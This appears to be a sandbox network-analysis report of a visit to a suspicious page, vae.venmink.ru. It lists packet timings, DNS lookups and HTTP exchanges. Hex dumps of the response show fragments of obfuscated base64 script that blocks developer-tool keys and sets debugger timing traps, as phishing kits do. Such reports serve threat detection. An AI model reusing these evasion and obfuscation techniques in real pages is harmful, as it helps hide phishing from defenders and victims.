                                                                    Dec 19, 2024 17:51:21.175774097 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.175822973 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.184416056 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.184458017 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.184499025 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.193145990 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.193164110 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.193232059 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.193253040 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.200783968 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.200848103 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.200865030 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.201158047 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.205125093 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.205135107 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.205190897 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.213269949 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.213290930 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.213340044 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.213387012 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.221461058 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.221558094 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.225394964 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.225466967 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.233666897 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.233736038 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.241794109 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.241861105 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.245913982 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.246005058 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.254034042 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.254169941 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:21.254235983 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.254340887 CET49738443192.168.2.5104.18.94.41
                                                                    Dec 19, 2024 17:51:21.254359007 CET44349738104.18.94.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.162237883 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.164742947 CET49746443192.168.2.5104.18.95.41
                                                                    Dec 19, 2024 17:51:22.164757013 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.165047884 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.165410042 CET49746443192.168.2.5104.18.95.41
                                                                    Dec 19, 2024 17:51:22.165477991 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.165801048 CET49746443192.168.2.5104.18.95.41
                                                                    Dec 19, 2024 17:51:22.207331896 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.620629072 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.620709896 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:51:22.620822906 CET49746443192.168.2.5104.18.95.41
                                                                    Dec 19, 2024 17:51:22.621869087 CET49746443192.168.2.5104.18.95.41
                                                                    Dec 19, 2024 17:51:22.621885061 CET44349746104.18.95.41192.168.2.5
                                                                    Dec 19, 2024 17:52:05.558969021 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:05.559015036 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:05.559113979 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:05.559505939 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:05.559520006 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:07.261956930 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:07.262377024 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:07.262399912 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:07.262695074 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:07.263004065 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:07.263066053 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:07.304194927 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:16.992031097 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:16.992122889 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:52:16.992223024 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:17.744541883 CET49848443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:52:17.744571924 CET44349848172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:05.619448900 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:05.619493961 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:05.619626045 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:05.619921923 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:05.619940996 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:07.322828054 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:07.323333025 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:07.323344946 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:07.323777914 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:07.324330091 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:07.324394941 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:07.368293047 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:17.054301977 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:17.054491997 CET44349988172.217.19.228192.168.2.5
                                                                    Dec 19, 2024 17:53:17.054567099 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:17.749916077 CET49988443192.168.2.5172.217.19.228
                                                                    Dec 19, 2024 17:53:17.749960899 CET44349988172.217.19.228192.168.2.5
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Dec 19, 2024 17:51:01.387190104 CET53600581.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:01.610956907 CET53605721.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:01.611068010 CET53536361.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:04.329644918 CET53550171.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:04.543600082 CET6154153192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:04.543767929 CET5197753192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:04.659765959 CET53625931.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:04.933243990 CET53519771.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:04.933294058 CET53615411.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:05.492579937 CET5427753192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:05.492743015 CET5209453192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:05.629767895 CET53542771.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:05.631025076 CET53520941.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:06.027267933 CET53621931.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:13.531431913 CET6462253192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:13.531620979 CET5310153192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:13.532109022 CET6014053192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:13.532255888 CET5409453192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:13.532620907 CET6003253192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:13.532777071 CET5870653192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:13.668658972 CET53531011.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:13.669130087 CET53601401.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:13.669141054 CET53540941.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:13.669820070 CET53587061.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:13.672080994 CET53646221.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:13.672769070 CET53600321.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:15.727895021 CET5225253192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:15.728152037 CET5540053192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:15.772356033 CET6053753192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:15.774734974 CET6341253192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:15.866235018 CET53522521.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:15.866257906 CET53554001.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:15.912380934 CET53634121.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:15.912415028 CET53605371.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:17.332153082 CET5329153192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:17.332273960 CET5298053192.168.2.51.1.1.1
                                                                    Dec 19, 2024 17:51:17.469018936 CET53532911.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:17.470825911 CET53529801.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:21.324601889 CET53648621.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:51:40.197930098 CET53534491.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:52:01.085017920 CET53527941.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:52:02.708718061 CET53594501.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:52:33.662529945 CET53648011.1.1.1192.168.2.5
                                                                    Dec 19, 2024 17:53:19.598402023 CET53571141.1.1.1192.168.2.5
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Dec 19, 2024 17:51:04.543600082 CET192.168.2.51.1.1.10x3341Standard query (0)vae.venmink.ruA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:04.543767929 CET192.168.2.51.1.1.10xfcb3Standard query (0)vae.venmink.ru65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:05.492579937 CET192.168.2.51.1.1.10x351Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:05.492743015 CET192.168.2.51.1.1.10x5a7Standard query (0)www.google.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.531431913 CET192.168.2.51.1.1.10x47a2Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.531620979 CET192.168.2.51.1.1.10xd784Standard query (0)code.jquery.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.532109022 CET192.168.2.51.1.1.10x3b1aStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.532255888 CET192.168.2.51.1.1.10x4cb9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.532620907 CET192.168.2.51.1.1.10x156fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.532777071 CET192.168.2.51.1.1.10xd61dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.727895021 CET192.168.2.51.1.1.10xe335Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.728152037 CET192.168.2.51.1.1.10x689eStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.772356033 CET192.168.2.51.1.1.10xda45Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.774734974 CET192.168.2.51.1.1.10x1a3aStandard query (0)code.jquery.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:17.332153082 CET192.168.2.51.1.1.10x737cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:17.332273960 CET192.168.2.51.1.1.10x90bbStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Dec 19, 2024 17:51:04.933243990 CET1.1.1.1192.168.2.50xfcb3No error (0)vae.venmink.ru65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:04.933294058 CET1.1.1.1192.168.2.50x3341No error (0)vae.venmink.ru104.21.85.123A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:04.933294058 CET1.1.1.1192.168.2.50x3341No error (0)vae.venmink.ru172.67.205.181A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:05.629767895 CET1.1.1.1192.168.2.50x351No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:05.631025076 CET1.1.1.1192.168.2.50x5a7No error (0)www.google.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.669130087 CET1.1.1.1192.168.2.50x3b1aNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.669130087 CET1.1.1.1192.168.2.50x3b1aNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.669141054 CET1.1.1.1192.168.2.50x4cb9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.669820070 CET1.1.1.1192.168.2.50xd61dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.672080994 CET1.1.1.1192.168.2.50x47a2No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.672080994 CET1.1.1.1192.168.2.50x47a2No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.672080994 CET1.1.1.1192.168.2.50x47a2No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.672080994 CET1.1.1.1192.168.2.50x47a2No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.672769070 CET1.1.1.1192.168.2.50x156fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:13.672769070 CET1.1.1.1192.168.2.50x156fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.866235018 CET1.1.1.1192.168.2.50xe335No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.866235018 CET1.1.1.1192.168.2.50xe335No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.866257906 CET1.1.1.1192.168.2.50x689eNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.912415028 CET1.1.1.1192.168.2.50xda45No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.912415028 CET1.1.1.1192.168.2.50xda45No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.912415028 CET1.1.1.1192.168.2.50xda45No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:15.912415028 CET1.1.1.1192.168.2.50xda45No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:17.469018936 CET1.1.1.1192.168.2.50x737cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:17.469018936 CET1.1.1.1192.168.2.50x737cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                    Dec 19, 2024 17:51:17.470825911 CET1.1.1.1192.168.2.50x90bbNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    • vae.venmink.ru
                                                                    • https:
                                                                      • cdnjs.cloudflare.com
                                                                      • code.jquery.com
                                                                      • challenges.cloudflare.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.549717104.21.85.1234431100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-12-19 16:51:07 UTC646OUTGET /jK5I/ HTTP/1.1
                                                                    Host: vae.venmink.ru
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-Dest: iframe
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-12-19 16:51:13 UTC1243INHTTP/1.1 200 OK
                                                                    Date: Thu, 19 Dec 2024 16:51:13 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Cache-Control: no-cache, private
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2FCtFLUZ540sijR2CwcXwk26T5GUc3PQetw%2FMuc16%2FFkmysASH4aP8zP5UU5YW7fbctruHSHhgNtqO85geJqBlJvxMpt9KGe0c3nU9MseH7UwK6Jpj4CYB19W%2FG8Cg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=492&min_rtt=478&rtt_var=162&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1550&delivery_rate=5019064&cwnd=249&unsent_bytes=0&cid=fc16cf876ab118d0&ts=5298&x=0"
                                                                    Set-Cookie: XSRF-TOKEN=eyJpdiI6InQrWVhSeTB5WlRZT0FKUFV2eEVTTHc9PSIsInZhbHVlIjoiOTU4VCtsYit3T0ZhRy9CdGQxZHdjcGpObjZjRzJXUno2UjZSZ1BuZkZXVzd3WXE5L01GVHM1U0ZtNzFqeVRoVE92ZkdoYXZlaUFTOUNZME9Odlh4WjVHL1pxeWxyNGxtWjUvWkJUamF1VGRpdUpDaUc3S1M1NmN2MEEwVE9kdEkiLCJtYWMiOiIyNmRlMmMwNzRmYjU2OWViZjNkNzlmNjJiMjRhMmU4ZmRhOGUxMjBiOGRmMDNlM2Q3Nzg0YjM5ODNhNjQ4YmQ1IiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 18:51:13 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                    2024-12-19 16:51:13 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 6c 76 53 6b 6c 71 4f 53 39 4b 52 44 5a 4d 65 56 67 31 59 7a 4e 75 63 30 78 61 63 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 54 46 4b 53 44 45 76 62 32 70 69 61 47 4a 45 4e 6a 4d 79 54 6e 6c 4c 53 47 52 73 55 7a 56 31 59 6c 68 4a 55 43 39 4c 4d 57 4e 4a 51 54 46 6b 55 33 42 43 65 46 6f 35 55 6d 74 47 55 6a 41 35 53 54 4e 4e 54 47 70 78 52 46 64 54 64 55 31 4b 5a 54 52 5a 61 32 70 4e 51 6e 41 76 4e 6a 45 78 4d 55 64 4f 51 6d 35 54 59 56 6c 47 53 57 4e 7a 65 6c 55 33 63 55 39 79 4b 79 39 36 4c 31 56 79 54 33 64 30 51 57 68 75 61 45 56 6f 61 56 52 58 51 30 5a 71 63 6b 31 52 61 54 46 79 54 44 6c 57 4c 7a 4e 34 5a 6d 52 42 57 55 6f
                                                                    Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IklvSklqOS9KRDZMeVg1YzNuc0xacEE9PSIsInZhbHVlIjoiSTFKSDEvb2piaGJENjMyTnlLSGRsUzV1YlhJUC9LMWNJQTFkU3BCeFo5UmtGUjA5STNNTGpxRFdTdU1KZTRZa2pNQnAvNjExMUdOQm5TYVlGSWNzelU3cU9yKy96L1VyT3d0QWhuaEVoaVRXQ0Zqck1RaTFyTDlWLzN4ZmRBWUo
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 34 64 63 34 0d 0a 3c 21 2d 2d 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 69 6e 20 77 68 61 74 20 79 6f 75 20 68 61 76 65 2c 20 62 75 74 20 77 68 6f 20 79 6f 75 20 61 72 65 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 2f 2a 20 53 75 63 63 65 73 73 20 69 73 20 6e 6f 74 20 62 75 69 6c 74 20 6f 6e 20 73 75 63 63 65 73 73 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 61 69 6c 75 72 65 2e 20 49 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 66 72 75 73 74 72 61 74 69 6f 6e 2e 20 53 6f 6d 65 74 69 6d 65 73 20 69 74 26 23 30 33 39 3b 73 20 62 75 69 6c 74 20 6f 6e 20 63 61 74 61 73 74 72 6f 70 68 65 2e 20 2a 2f 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 32 51 55 55 75 64 6d 56 75 62 57 6c 75 61 79 35 79
                                                                    Data Ascii: 4dc4... Success is not in what you have, but who you are. --><script>/* Success is not built on success. It&#039;s built on failure. It&#039;s built on frustration. Sometimes it&#039;s built on catastrophe. */if(atob("aHR0cHM6Ly92QUUudmVubWluay5y
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 65 77 30 4b 49 31 70 42 55 56 64 35 56 6c 52 4b 64 32 30 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 57 6b 46 52 56 33 6c 57 56 45 70 33 62 53 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 31 70 42 55 56 64 35 56 6c 52 4b 64 32 30 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 45 32 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64
                                                                    Data Ascii: ew0KI1pBUVd5VlRKd20gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojWkFRV3lWVEp3bSBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI1pBUVd5VlRKd20uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTE2cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75
                                                                    Data Ascii: W1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVu
                                                                    2024-12-19 16:51:13 UTC1369INData Raw: 41 67 49 48 4e 6c 64 45 6c 75 64 47 56 79 64 6d 46 73 4b 47 5a 31 62 6d 4e 30 61 57 39 75 4b 43 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 54 61 6b 6c 71 53 33 42 43 63 55 35 69 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 44 53 45 5a 35 63 6b 70 68 61 55 4a 51 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 44 53 45 5a 35 63 6b 70 68 61 55 4a 51 49 43 30 67 55 32 70 4a 61 6b 74 77 51 6e 46 4f 59 69 41 2b 49 45 35 6d 54 33 68 50 54 32 4a 36 63 6b 67 67 4a
                                                                    Data Ascii: AgIHNldEludGVydmFsKGZ1bmN0aW9uKCkgew0KICAgICAgICBjb25zdCBTaklqS3BCcU5iID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCBDSEZ5ckphaUJQID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmIChDSEZ5ckphaUJQIC0gU2pJaktwQnFOYiA+IE5mT3hPT2J6ckggJ
